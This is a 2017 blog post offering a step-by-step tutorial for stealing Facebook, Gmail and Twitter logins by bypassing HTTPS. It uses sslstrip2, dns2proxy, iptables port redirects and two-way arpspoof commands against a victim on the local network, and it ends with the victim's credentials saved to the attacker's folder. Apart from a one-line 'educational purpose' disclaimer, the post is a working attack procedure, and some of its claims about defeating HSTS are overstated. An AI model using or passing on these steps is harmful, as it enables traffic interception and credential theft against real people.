Saturday, February 18, 2017

How to Hack facebook,gmail,twitter || Bypass HSTS || sslstrip2 and Dns2proxy

How to Bypass HSTS on google chrome ,safari ,firefox ?

HSTS( Http strict transport security )

Http strict transport securities  are basically the securities mostly seen on websites like google , paypal , apple , facebook , twitter etc . These securities forces users to communicate with servers having HTTPS . These policies focus on passing all users through HTTPS intead of plain text HTTP. 


Methods for bypassing HSTS using sslstrip2 , dns2proxy 

Hopefully , we can bypass these hsts using tools sslstrip2 and dns2proxy . 
Download sslstrip and dns2proxy first by entering command on terminal :
git clone https://github.com/byt3bl33d3r/sslstrip2
git clone https://github.com/singe/dns2proxy
  • Then after downloading install sslstrip2 by first enter into sslstrip2 directory . Then for installation command : sudo python setup.py install
  • Then, open up root terminal . We must forward our ip address . For forwarding our ip address enter command :  echo "1" > /proc/sys/net/ipv4/ip_forward
  • Then enter this command for flushing ip address : iptables --flush
  • Then after that enter this command : iptables --flush -t nat
  • Then we must redirect our ip address to port 9000 . So , for this enter command : iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
  • Then enter another command for redirecting on specific port : iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
  • Then this part is finished after this just open up another root terminal and go inside dns2proxy directory then run dns2proxy by command : python dns2proxy.py
  • Then open up another root terminal and run sslstrip on debug mode :sslstrip -l 9000 -a 
  • Then check your default ip gateway by command : netstat -nr
  • Then check your interface by command : ifconfig
  • For running , arpspoof we need gateway ip address , victim ip address and interface in which we are currently working .
  • Run arpspoof by command : arpspoof -i wlan0 -t 192.168.1.2(victim ip address) 192.168.1.1 ( My gateway ip address )
  • Again , open up another root terminal and run command : arpspoof -i wlan0 -t 192.168.1.1(Now, gateway ip address at first ) 192.168.1.2( victims ip address )
  • After entering this command whenever victim starts to open up google chrome and goes through login on facebook then his all traffic will be automatically redirect to our http site then after victim enter his credentials the log will be saved in our folder .

Note : Only for educational purpose .

For more detail explanation check out my video walkthrough on this subject down below .




No comments:

Post a Comment